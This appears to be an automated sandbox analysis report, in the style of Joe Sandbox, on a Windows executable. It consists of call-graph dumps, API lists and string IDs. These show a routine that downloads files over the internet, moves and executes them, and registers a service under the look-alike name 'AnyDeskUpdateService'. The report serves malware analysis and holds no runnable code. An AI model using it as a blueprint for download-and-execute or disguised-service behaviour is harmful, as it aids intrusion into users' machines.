7ff6c786d340 23705->23706 23707->23700 23708 7ff6c786d39c GetModuleHandleExW GetProcAddress 23707->23708 23708->23700 23710 7ff6c787ab80 _Getctype 28 API calls 23709->23710 23711 7ff6c78799e1 23710->23711 23714 7ff6c787675c 28 API calls 2 library calls 23711->23714 23948 7ff6c7877e70 6 API calls 23917 7ff6c7867f70 34 API calls 2 library calls 22626 7ff6c787e95c 22627 7ff6c787e9bf 22626->22627 22628 7ff6c787e98e 22626->22628 22627->22628 22635 7ff6c787e9d6 22627->22635 22728 7ff6c7874bc4 22628->22728 22632 7ff6c787ea8e 22633 7ff6c787eae9 22632->22633 22634 7ff6c787eabe 22632->22634 22638 7ff6c787b160 _set_fmode 6 API calls 22633->22638 22667 7ff6c787f474 22634->22667 22635->22632 22635->22635 22732 7ff6c787b160 22635->22732 22641 7ff6c787eb03 22638->22641 22640 7ff6c787eae1 22747 7ff6c7874aa8 11 API calls _invalid_parameter_noinfo_noreturn 22640->22747 22663 7ff6c787eb0b 22641->22663 22745 7ff6c7879a04 28 API calls 2 library calls 22641->22745 22644 7ff6c787ea44 22738 7ff6c787b1d8 22644->22738 22645 7ff6c787ea53 22743 7ff6c7879a04 28 API calls 2 library calls 22645->22743 22649 7ff6c787eb1e 22649->22640 22655 7ff6c7874bc4 _set_fmode 6 API calls 22649->22655 22650 7ff6c787e99e 22651 7ff6c787b1d8 __free_lconv_num 6 API calls 22651->22640 22652 7ff6c787ea65 22652->22640 22744 7ff6c78898d4 28 API calls 2 library calls 22652->22744 22661 7ff6c787eb27 22655->22661 22657 7ff6c787ea7b 22657->22640 22658 7ff6c787b1d8 __free_lconv_num 6 API calls 22657->22658 22658->22632 22660 7ff6c787f474 31 API calls 22660->22661 22661->22640 22661->22660 22662 7ff6c787eb66 22661->22662 22661->22663 22746 7ff6c7879a04 28 API calls 2 library calls 22661->22746 22664 7ff6c7874bc4 _set_fmode 6 API calls 22662->22664 22663->22651 22665 7ff6c787eb6b 22664->22665 22666 7ff6c787ebac 57 API calls 22665->22666 22666->22663 22668 7ff6c787f49a 22667->22668 22669 7ff6c787f490 22667->22669 22749 7ff6c7876178 22668->22749 22748 7ff6c787f3c8 29 API calls 5 library calls 22669->22748 22673 7ff6c787f4c2 22757 7ff6c7876af4 22673->22757 22676 7ff6c787f52e 22677 7ff6c787eac8 22676->22677 22678 7ff6c787b1d8 __free_lconv_num 6 API calls 22676->22678 22677->22640 22679 7ff6c787ebac 22677->22679 22678->22677 22680 7ff6c787ebf8 22679->22680 22681 7ff6c787ebdf 22679->22681 22680->22681 22683 7ff6c787ec0d 22680->22683 22684 7ff6c787ec03 22680->22684 22682 7ff6c7874bc4 _set_fmode 6 API calls 22681->22682 22685 7ff6c787ebe4 22682->22685 22806 7ff6c7889c38 22683->22806 22686 7ff6c7874ba4 _fread_nolock 6 API calls 22684->22686 22858 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 22685->22858 22686->22681 22690 7ff6c787ec30 22691 7ff6c787b1d8 __free_lconv_num 6 API calls 22690->22691 22694 7ff6c787ec39 22691->22694 22695 7ff6c787b1d8 __free_lconv_num 6 API calls 22694->22695 22727 7ff6c787ebef 22695->22727 22696 7ff6c787b1d8 __free_lconv_num 6 API calls 22696->22690 22698 7ff6c787ec7f _fread_nolock 22837 7ff6c7889d9c 22698->22837 22701 7ff6c787ed52 __vcrt_getptd_noinit 22859 7ff6c7874b38 6 API calls 2 library calls 22701->22859 22702 7ff6c787edff BuildCatchObjectHelperInternal 22703 7ff6c787ed0c WaitForSingleObject GetExitCodeProcess 22703->22701 22708 7ff6c787ed2a 22703->22708 22704 7ff6c787ed84 22706 7ff6c787ed8a 22704->22706 22707 7ff6c787edae 22704->22707 22712 7ff6c787ed98 22706->22712 22713 7ff6c787ed8f CloseHandle 22706->22713 22709 7ff6c787edbc 22707->22709 22710 7ff6c787edb3 CloseHandle 22707->22710 22714 7ff6c787ed3c 22708->22714 22715 7ff6c787ed33 CloseHandle 22708->22715 22718 7ff6c787b1d8 __free_lconv_num 6 API calls 22709->22718 22710->22709 22711 7ff6c787ed5f 22719 7ff6c787ed6d 22711->22719 22720 7ff6c787ed64 CloseHandle 22711->22720 22716 7ff6c787ec6b 22712->22716 22721 7ff6c787ed9d CloseHandle 22712->22721 22713->22712 22714->22716 22717 7ff6c787ed41 CloseHandle 22714->22717 22715->22714 22716->22696 22717->22716 22722 7ff6c787edc5 22718->22722 22719->22716 22723 7ff6c787ed76 CloseHandle 22719->22723 22720->22719 22721->22716 22724 7ff6c787b1d8 __free_lconv_num 6 API calls 22722->22724 22723->22716 22725 7ff6c787edd2 22724->22725 22726 7ff6c787b1d8 __free_lconv_num 6 API calls 22725->22726 22726->22727 22727->22640 22729 7ff6c787acf8 _set_fmode 6 API calls 22728->22729 22730 7ff6c7874bcd 22729->22730 22731 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 22730->22731 22731->22650 22737 7ff6c787b171 _set_fmode std::_Facet_Register 22732->22737 22733 7ff6c787b1a6 RtlAllocateHeap 22735 7ff6c787b1c0 22733->22735 22733->22737 22734 7ff6c787b1c2 22736 7ff6c7874bc4 _set_fmode 5 API calls 22734->22736 22735->22644 22735->22645 22736->22735 22737->22733 22737->22734 22739 7ff6c787b1dd HeapFree 22738->22739 22742 7ff6c787b20c 22738->22742 22740 7ff6c787b1f8 __vcrt_getptd_noinit __free_lconv_num 22739->22740 22739->22742 22741 7ff6c7874bc4 _set_fmode 5 API calls 22740->22741 22741->22742 22742->22650 22743->22652 22744->22657 22745->22649 22746->22661 22748->22677 22750 7ff6c787619c 22749->22750 22756 7ff6c7876197 22749->22756 22750->22756 22779 7ff6c787ab80 22750->22779 22754 7ff6c78761da 22801 7ff6c787d034 28 API calls TranslateName 22754->22801 22756->22673 22758 7ff6c7876b42 22757->22758 22759 7ff6c7876b1e 22757->22759 22760 7ff6c7876b9c 22758->22760 22761 7ff6c7876b47 22758->22761 22763 7ff6c787b1d8 __free_lconv_num 6 API calls 22759->22763 22764 7ff6c7876b2d 22759->22764 22805 7ff6c7882d98 MultiByteToWideChar 22760->22805 22761->22764 22766 7ff6c787b1d8 __free_lconv_num 6 API calls 22761->22766 22770 7ff6c7876b5c 22761->22770 22763->22764 22764->22676 22778 7ff6c787f3c8 29 API calls 5 library calls 22764->22778 22766->22770 22804 7ff6c787cf68 7 API calls 2 library calls 22770->22804 22778->22676 22780 7ff6c787ab95 __vcrt_getptd_noinit 22779->22780 22781 7ff6c787aba4 FlsGetValue 22780->22781 22782 7ff6c787abc1 FlsSetValue 22780->22782 22783 7ff6c787abbb 22781->22783 22789 7ff6c787abb1 __vcrt_getptd_noinit 22781->22789 22784 7ff6c787abd3 22782->22784 22782->22789 22783->22782 22785 7ff6c787b160 _set_fmode 6 API calls 22784->22785 22786 7ff6c787abe2 22785->22786 22787 7ff6c787ac00 FlsSetValue 22786->22787 22788 7ff6c787abf0 FlsSetValue 22786->22788 22792 7ff6c787ac0c FlsSetValue 22787->22792 22793 7ff6c787ac1e 22787->22793 22791 7ff6c787abf9 22788->22791 22790 7ff6c78761b7 22789->22790 22803 7ff6c787675c 28 API calls 2 library calls 22789->22803 22800 7ff6c787cfc8 28 API calls _Getctype 22790->22800 22795 7ff6c787b1d8 __free_lconv_num 6 API calls 22791->22795 22792->22791 22802 7ff6c787a928 6 API calls _set_fmode 22793->22802 22795->22789 22798 7ff6c787ac26 22799 7ff6c787b1d8 __free_lconv_num 6 API calls 22798->22799 22799->22789 22800->22754 22801->22756 22802->22798 22804->22764 22807 7ff6c7889c6f 22806->22807 22808 7ff6c787b160 _set_fmode 6 API calls 22807->22808 22809 7ff6c7889ca5 22808->22809 22810 7ff6c7889cad 22809->22810 22815 7ff6c7889cc3 22809->22815 22860 7ff6c7874b38 6 API calls 2 library calls 22810->22860 22811 7ff6c7889cba 22816 7ff6c787b1d8 __free_lconv_num 6 API calls 22811->22816 22814 7ff6c7889cb5 22817 7ff6c7874bc4 _set_fmode 6 API calls 22814->22817 22815->22811 22818 7ff6c7889d89 22815->22818 22861 7ff6c7879a04 28 API calls 2 library calls 22815->22861 22819 7ff6c7889d24 22816->22819 22817->22811 22863 7ff6c7874aa8 11 API calls _invalid_parameter_noinfo_noreturn 22818->22863 22821 7ff6c7889d49 22819->22821 22862 7ff6c7889940 47 API calls 7 library calls 22819->22862 22822 7ff6c787b1d8 __free_lconv_num 6 API calls 22821->22822 22825 7ff6c787ec28 22822->22825 22825->22690 22831 7ff6c787f004 22825->22831 22826 7ff6c7889d3b 22827 7ff6c7889d3f 22826->22827 22828 7ff6c7889d4b 22826->22828 22829 7ff6c787b1d8 __free_lconv_num 6 API calls 22827->22829 22830 7ff6c787b1d8 __free_lconv_num 6 API calls 22828->22830 22829->22821 22830->22821 22864 7ff6c787e91c 22831->22864 22833 7ff6c787ec67 22833->22716 22834 7ff6c7874ba4 22833->22834 22879 7ff6c787acf8 22834->22879 22836 7ff6c7874bad 22836->22698 22838 7ff6c7876178 TranslateName 28 API calls 22837->22838 22840 7ff6c7889e26 22838->22840 22839 7ff6c7876af4 8 API calls 22841 7ff6c7889e98 22839->22841 22840->22839 22842 7ff6c788a001 22841->22842 22843 7ff6c7876178 TranslateName 28 API calls 22841->22843 22844 7ff6c788a012 22842->22844 22846 7ff6c787b1d8 __free_lconv_num 6 API calls 22842->22846 22850 7ff6c7889eac 22843->22850 22845 7ff6c788a021 22844->22845 22847 7ff6c787b1d8 __free_lconv_num 6 API calls 22844->22847 22848 7ff6c787ecf1 22845->22848 22849 7ff6c787b1d8 __free_lconv_num 6 API calls 22845->22849 22846->22844 22847->22845 22848->22701 22848->22702 22848->22703 22848->22704 22849->22848 22851 7ff6c7876af4 8 API calls 22850->22851 22852 7ff6c7889f19 22851->22852 22852->22842 22853 7ff6c7889fb5 CreateProcessW 22852->22853 22854 7ff6c7876178 TranslateName 28 API calls 22852->22854 22853->22842 22855 7ff6c7889f3d 22854->22855 22856 7ff6c7876af4 8 API calls 22855->22856 22857 7ff6c7889faa 22856->22857 22857->22842 22857->22853 22858->22727 22859->22711 22860->22814 22861->22815 22862->22826 22865 7ff6c787e938 22864->22865 22868 7ff6c787ee08 22865->22868 22867 7ff6c787e941 22867->22833 22869 7ff6c787ee4f 22868->22869 22870 7ff6c787ee93 22869->22870 22871 7ff6c787ee81 22869->22871 22873 7ff6c787b160 _set_fmode 6 API calls 22870->22873 22872 7ff6c7874bc4 _set_fmode 6 API calls 22871->22872 22874 7ff6c787ee86 22872->22874 22875 7ff6c787eeb4 22873->22875 22874->22867 22876 7ff6c7874bc4 _set_fmode 6 API calls 22875->22876 22878 7ff6c787eec1 _fread_nolock 22875->22878 22876->22878 22877 7ff6c787b1d8 __free_lconv_num 6 API calls 22877->22874 22878->22877 22881 7ff6c787ad0d __vcrt_getptd_noinit 22879->22881 22880 7ff6c787ad39 FlsSetValue 22882 7ff6c787ad4b 22880->22882 22887 7ff6c787ad29 __vcrt_getptd_noinit 22880->22887 22881->22880 22881->22887 22883 7ff6c787b160 _set_fmode 2 API calls 22882->22883 22884 7ff6c787ad5a 22883->22884 22885 7ff6c787ad78 FlsSetValue 22884->22885 22886 7ff6c787ad68 FlsSetValue 22884->22886 22889 7ff6c787ad96 22885->22889 22890 7ff6c787ad84 FlsSetValue 22885->22890 22888 7ff6c787ad71 22886->22888 22887->22836 22891 7ff6c787b1d8 __free_lconv_num 2 API calls 22888->22891 22895 7ff6c787a928 6 API calls _set_fmode 22889->22895 22890->22888 22891->22887 22893 7ff6c787ad9e 22894 7ff6c787b1d8 __free_lconv_num 2 API calls 22893->22894 22894->22887 22895->22893 23980 7ff6c788f960 RtlDecodePointer _RTC_Initialize 23879 7ff6c787f064 47 API calls 6 library calls 23880 7ff6c786d860 47 API calls __free_lconv_num 23882 7ff6c788d85c RtlUnwindEx __GSHandlerCheck_SEH __GSHandlerCheckCommon 23949 7ff6c7866660 37 API calls 2 library calls 23981 7ff6c788d990 31 API calls 3 library calls 23715 7ff6c7862292 23716 7ff6c78622ae 23715->23716 23717 7ff6c7852660 52 API calls 23716->23717 23718 7ff6c7862358 23717->23718 23719 7ff6c78695e4 Concurrency::cancel_current_task 2 API calls 23718->23719 23720 7ff6c7862369 23719->23720 23721 7ff6c7861ef0 55 API calls 23720->23721 23722 7ff6c786238a 23721->23722 23723 7ff6c78643e0 52 API calls 23722->23723 23724 7ff6c7862395 23723->23724 23725 7ff6c7861c30 52 API calls 23724->23725 23726 7ff6c786239d 23725->23726 23950 7ff6c7875a90 33 API calls 5 library calls 23983 7ff6c7860190 53 API calls 3 library calls 23954 7ff6c78832b4 34 API calls 6 library calls 23889 7ff6c78510b0 71 API calls shared_ptr 23756 7ff6c785e4b0 23757 7ff6c785e4f6 23756->23757 23758 7ff6c785e4c3 _RTC_Initialize 23756->23758 23758->23757 23761 7ff6c786dca4 23758->23761 23762 7ff6c786dcb2 23761->23762 23764 7ff6c786dcb9 23761->23764 23774 7ff6c786dadc 44 API calls 23762->23774 23765 7ff6c785e4e6 23764->23765 23767 7ff6c786da9c 23764->23767 23775 7ff6c786d904 RtlEnterCriticalSection 23767->23775 23769 7ff6c786dab9 23770 7ff6c786dbc8 44 API calls 23769->23770 23771 7ff6c786dac5 23770->23771 23772 7ff6c786d910 _fread_nolock RtlLeaveCriticalSection 23771->23772 23773 7ff6c786dacf 23772->23773 23773->23765 23774->23765 23956 7ff6c78662a0 30 API calls 23989 7ff6c78585a0 SetServiceStatus SetEvent

                                                                                                      Executed Functions

                                                                                                      Function 00007FF6C7852840 Relevance: 92.7, APIs: 16, Strings: 35, Instructions: 3486filestringsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff6c7852840-7ff6c7852d7b call 7ff6c785fb30 call 7ff6c785fe90 call 7ff6c785fe20 call 7ff6c7873510 call 7ff6c785fae0 call 7ff6c785fe90 call 7ff6c785f9f0 call 7ff6c785fcd0 call 7ff6c785fbc0 GetFileAttributesW 19 7ff6c7852d7d-7ff6c7852d7f 0->19 20 7ff6c7852d85-7ff6c7852dba call 7ff6c785fe20 call 7ff6c785f530 0->20 19->20 21 7ff6c7852ef1-7ff6c7854ae8 call 7ff6c785e410 call 7ff6c785fcd0 call 7ff6c785e3b0 call 7ff6c785fcd0 call 7ff6c785e370 call 7ff6c785fcd0 call 7ff6c785e330 call 7ff6c785fcd0 call 7ff6c785e130 call 7ff6c785fcd0 call 7ff6c785e010 call 7ff6c785fcd0 call 7ff6c785dfd0 call 7ff6c785fcd0 call 7ff6c785fbc0 GetFileAttributesW 19->21 29 7ff6c7852ecf-7ff6c7852ed3 call 7ff6c785f410 20->29 30 7ff6c7852dc0-7ff6c7852eca call 7ff6c7861080 * 8 call 7ff6c785e440 call 7ff6c78620a0 * 2 call 7ff6c785f990 20->30 86 7ff6c7854aea-7ff6c7854aec 21->86 87 7ff6c7854af2-7ff6c785506f call 7ff6c785d350 call 7ff6c785fcd0 call 7ff6c785fbc0 * 2 call 7ff6c785cdf0 21->87 35 7ff6c7852ed8-7ff6c7852eec call 7ff6c785f4b0 call 7ff6c785f9d0 29->35 30->29 35->21 86->87 88 7ff6c785508e-7ff6c78550a6 call 7ff6c785fbc0 GetFileAttributesW 86->88 116 7ff6c7855074-7ff6c7855089 InternetCloseHandle call 7ff6c785fc60 87->116 94 7ff6c78550a8-7ff6c78550aa 88->94 95 7ff6c78550d3-7ff6c785512b call 7ff6c785fbc0 GetFileAttributesW 88->95 94->95 97 7ff6c78550ac-7ff6c78550cd call 7ff6c785fbc0 * 2 MoveFileW 94->97 105 7ff6c785512d-7ff6c785512f 95->105 106 7ff6c7855135-7ff6c78556f4 call 7ff6c7861e20 call 7ff6c7861070 * 7 call 7ff6c785d2c0 call 7ff6c785fcd0 call 7ff6c785fbc0 * 2 call 7ff6c785cdf0 95->106 97->95 105->106 109 7ff6c7855712 105->109 199 7ff6c78556f9-7ff6c7855710 call 7ff6c785cf30 call 7ff6c785fc60 106->199 114 7ff6c7855715-7ff6c785572d call 7ff6c785fbc0 GetFileAttributesW 109->114 121 7ff6c7855737-7ff6c7856b2c call 7ff6c7861000 * 145 call 7ff6c785df90 call 7ff6c785fcd0 call 7ff6c785fbc0 * 2 call 7ff6c785cdf0 call 7ff6c785cf30 call 7ff6c7861030 * 17 call 7ff6c785df60 call 7ff6c785fcd0 call 7ff6c785fbc0 * 3 ShellExecuteExW 114->121 122 7ff6c785572f-7ff6c7855731 114->122 116->88 748 7ff6c7856b32-7ff6c7856d5a call 7ff6c7890050 call 7ff6c7861010 * 3 call 7ff6c7861060 * 15 call 7ff6c785cf50 call 7ff6c785df20 call 7ff6c78623b0 call 7ff6c785dbc0 call 7ff6c78623b0 call 7ff6c785df10 121->748 749 7ff6c7856d5f-7ff6c7856d8d WaitForSingleObject CloseHandle call 7ff6c785fc60 * 2 121->749 122->121 124 7ff6c7856d92-7ff6c7856e85 call 7ff6c785d200 call 7ff6c785fcd0 call 7ff6c785fbc0 lstrcmpiW 122->124 145 7ff6c7856e87-7ff6c7856e8c call 7ff6c7857a20 124->145 146 7ff6c7856e91-7ff6c78570ca GetCurrentProcessId call 7ff6c7851500 call 7ff6c7861010 * 15 call 7ff6c785d090 call 7ff6c785fcd0 call 7ff6c785fbd0 call 7ff6c785fbc0 * 3 ShellExecuteExW 124->146 158 7ff6c78578b5-7ff6c7857974 call 7ff6c785fc60 * 9 call 7ff6c785fe30 * 2 call 7ff6c78676f0 145->158 282 7ff6c785730a-7ff6c7857334 StartServiceCtrlDispatcherW 146->282 283 7ff6c78570d0-7ff6c7857305 call 7ff6c7890050 call 7ff6c7861010 * 18 call 7ff6c785cf50 call 7ff6c785d090 call 7ff6c78623b0 call 7ff6c785dbc0 call 7ff6c78623b0 call 7ff6c785df10 146->283 199->114 286 7ff6c785733a-7ff6c7857888 call 7ff6c7861050 * 53 call 7ff6c785db30 call 7ff6c785fcd0 call 7ff6c785fbc0 call 7ff6c78585f0 282->286 287 7ff6c785789b-7ff6c78578b4 call 7ff6c785fc60 * 2 282->287 283->282 567 7ff6c785788d-7ff6c785789a call 7ff6c785fc60 286->567 287->158 567->287 748->749 749->124
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Internet$Attributesstd::_$CloseHandleLockit$ErrorEventLast$ExecuteLockit::_Lockit::~_OpenReadRegisterShellSource_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCreateCtrlCurrentDeregisterDispatcherFacet_MoveObjectProcessReportServiceSingleStartWaitWritelstrcmpi
                                                                                                      • String ID: $x'x$%x*x$&x>x$)nln$,x'x$-x?x$.x5x$0r!r$20240913$3x9x$4x<x$5x=x$:r>r$:xyx$AnyDeskUpdateService$GY!Y$H}wM$M$NYOY$Nr<r$Qx$x$enfn$h1w{$jnhn$jxWx$pH}wM$sncn$t$ux(x$vzv$$w$wnmn$xx~x$}Y>Y$}wM
                                                                                                      • API String ID: 2772502545-4267904903
                                                                                                      • Opcode ID: 2efd94f85aca355810c0006856c6f39897300c774bbc6c3a7deb07320c0a45ca
                                                                                                      • Instruction ID: 6b88355e053e5ed74370372fb01d7f7c5a93b031e65d560ed3ca4f562b990eea
                                                                                                      • Opcode Fuzzy Hash: 2efd94f85aca355810c0006856c6f39897300c774bbc6c3a7deb07320c0a45ca
                                                                                                      • Instruction Fuzzy Hash: D5935D1552A6D299E730AF71D8103FA3A61FF68B4AF404036D38DCBAA9EF3D9641C705
                                                                                                      Function 00007FF6C788AD68 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 869 7ff6c788ad68-7ff6c788addb call 7ff6c788a94c 872 7ff6c788adf5-7ff6c788adff call 7ff6c788506c 869->872 873 7ff6c788addd-7ff6c788ade6 call 7ff6c7874ba4 869->873 878 7ff6c788ae01-7ff6c788ae18 call 7ff6c7874ba4 call 7ff6c7874bc4 872->878 879 7ff6c788ae1a-7ff6c788ae83 CreateFileW 872->879 880 7ff6c788ade9-7ff6c788adf0 call 7ff6c7874bc4 873->880 878->880 882 7ff6c788af00-7ff6c788af0b GetFileType 879->882 883 7ff6c788ae85-7ff6c788ae8b 879->883 891 7ff6c788b136-7ff6c788b156 880->891 886 7ff6c788af5e-7ff6c788af65 882->886 887 7ff6c788af0d-7ff6c788af48 call 7ff6c7890050 call 7ff6c7874b38 CloseHandle 882->887 889 7ff6c788aecd-7ff6c788aefb call 7ff6c7890050 call 7ff6c7874b38 883->889 890 7ff6c788ae8d-7ff6c788ae91 883->890 894 7ff6c788af67-7ff6c788af6b 886->894 895 7ff6c788af6d-7ff6c788af70 886->895 887->880 911 7ff6c788af4e-7ff6c788af59 call 7ff6c7874bc4 887->911 889->880 890->889 896 7ff6c788ae93-7ff6c788aecb CreateFileW 890->896 900 7ff6c788af76-7ff6c788afcb call 7ff6c7884f84 894->900 895->900 901 7ff6c788af72 895->901 896->882 896->889 909 7ff6c788afea-7ff6c788b01b call 7ff6c788a6cc 900->909 910 7ff6c788afcd-7ff6c788afd9 call 7ff6c788ab54 900->910 901->900 919 7ff6c788b021-7ff6c788b063 909->919 920 7ff6c788b01d-7ff6c788b01f 909->920 910->909 918 7ff6c788afdb 910->918 911->880 921 7ff6c788afdd-7ff6c788afe5 call 7ff6c787cca0 918->921 922 7ff6c788b085-7ff6c788b090 919->922 923 7ff6c788b065-7ff6c788b069 919->923 920->921 921->891 924 7ff6c788b134 922->924 925 7ff6c788b096-7ff6c788b09a 922->925 923->922 927 7ff6c788b06b-7ff6c788b080 923->927 924->891 925->924 928 7ff6c788b0a0-7ff6c788b0e5 CloseHandle CreateFileW 925->928 927->922 930 7ff6c788b0e7-7ff6c788b115 call 7ff6c7890050 call 7ff6c7874b38 call 7ff6c78851ac 928->930 931 7ff6c788b11a-7ff6c788b12f 928->931 930->931 931->924
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction ID: ca9865fb52dacb9599552919ab04e3b4c151828284931eaba2f2939d17222c8e
                                                                                                      • Opcode Fuzzy Hash: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction Fuzzy Hash: 26C1B136B29A4285EB50CFA5C4906AC3B61FB89BA9F015236DBAE973D4DF3CD451C300
                                                                                                      Function 00007FF6C785CDF0 Relevance: 10.6, APIs: 7, Instructions: 90filenetworkCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInternet$OpenRead$CloseCreateHandleWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 1744991900-0
                                                                                                      • Opcode ID: 362309099b881e5bbaf2cceeef3ea73f52e033be54d2f21a1e01227d0a0bf40a
                                                                                                      • Instruction ID: 8f40045829700a8253c8b93f97be265542ad41cd9199a139517c9970d130df08
                                                                                                      • Opcode Fuzzy Hash: 362309099b881e5bbaf2cceeef3ea73f52e033be54d2f21a1e01227d0a0bf40a
                                                                                                      • Instruction Fuzzy Hash: BA316E22A1968286EB608F61F81476ABB60FB89BC9F445135EF8D87B44DF3DD1058B04
                                                                                                      Function 00007FF6C787E95C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1196 7ff6c787e95c-7ff6c787e98c 1197 7ff6c787e9bf-7ff6c787e9c2 1196->1197 1198 7ff6c787e98e-7ff6c787e99e call 7ff6c7874bc4 call 7ff6c7874a58 1196->1198 1197->1198 1199 7ff6c787e9c4-7ff6c787e9c7 1197->1199 1207 7ff6c787e9a2-7ff6c787e9be 1198->1207 1199->1198 1202 7ff6c787e9c9-7ff6c787e9cf 1199->1202 1202->1198 1204 7ff6c787e9d1-7ff6c787e9d4 1202->1204 1204->1198 1206 7ff6c787e9d6-7ff6c787e9fd call 7ff6c788d9dc * 2 1204->1206 1212 7ff6c787ea03-7ff6c787ea06 1206->1212 1213 7ff6c787ea90-7ff6c787ea93 1206->1213 1216 7ff6c787ea9d-7ff6c787eabc call 7ff6c788d9dc 1212->1216 1217 7ff6c787ea0c-7ff6c787ea1d call 7ff6c788d9dc 1212->1217 1214 7ff6c787ea9a 1213->1214 1215 7ff6c787ea95-7ff6c787ea98 1213->1215 1214->1216 1215->1214 1215->1216 1223 7ff6c787eae9 1216->1223 1224 7ff6c787eabe-7ff6c787eaca call 7ff6c787f474 1216->1224 1217->1216 1222 7ff6c787ea1f 1217->1222 1225 7ff6c787ea22-7ff6c787ea29 1222->1225 1227 7ff6c787eaec-7ff6c787eaf3 1223->1227 1233 7ff6c787eb8b 1224->1233 1234 7ff6c787ead0-7ff6c787eadc call 7ff6c787ebac 1224->1234 1225->1225 1229 7ff6c787ea2b-7ff6c787ea42 call 7ff6c787b160 1225->1229 1227->1227 1228 7ff6c787eaf5-7ff6c787eb09 call 7ff6c787b160 1227->1228 1238 7ff6c787eb0b-7ff6c787eb0d 1228->1238 1239 7ff6c787eb0f-7ff6c787eb20 call 7ff6c7879a04 1228->1239 1240 7ff6c787ea44-7ff6c787ea4e call 7ff6c787b1d8 1229->1240 1241 7ff6c787ea53-7ff6c787ea67 call 7ff6c7879a04 1229->1241 1242 7ff6c787eb93 1233->1242 1243 7ff6c787eae1-7ff6c787eae4 1234->1243 1244 7ff6c787eb86 call 7ff6c787b1d8 1238->1244 1239->1242 1254 7ff6c787eb22-7ff6c787eb2e call 7ff6c7874bc4 1239->1254 1240->1207 1248 7ff6c787eb95-7ff6c787ebab call 7ff6c7874aa8 1241->1248 1255 7ff6c787ea6d-7ff6c787ea7d call 7ff6c78898d4 1241->1255 1242->1248 1243->1233 1244->1233 1261 7ff6c787eb31-7ff6c787eb44 call 7ff6c7879a04 1254->1261 1255->1248 1262 7ff6c787ea83-7ff6c787ea8e call 7ff6c787b1d8 1255->1262 1261->1242 1267 7ff6c787eb46-7ff6c787eb52 call 7ff6c787f474 1261->1267 1262->1216 1270 7ff6c787eb66-7ff6c787eb80 call 7ff6c7874bc4 call 7ff6c787ebac 1267->1270 1271 7ff6c787eb54-7ff6c787eb62 1267->1271 1274 7ff6c787eb83 1270->1274 1271->1261 1272 7ff6c787eb64 1271->1272 1272->1274 1274->1244
                                                                                                      APIs
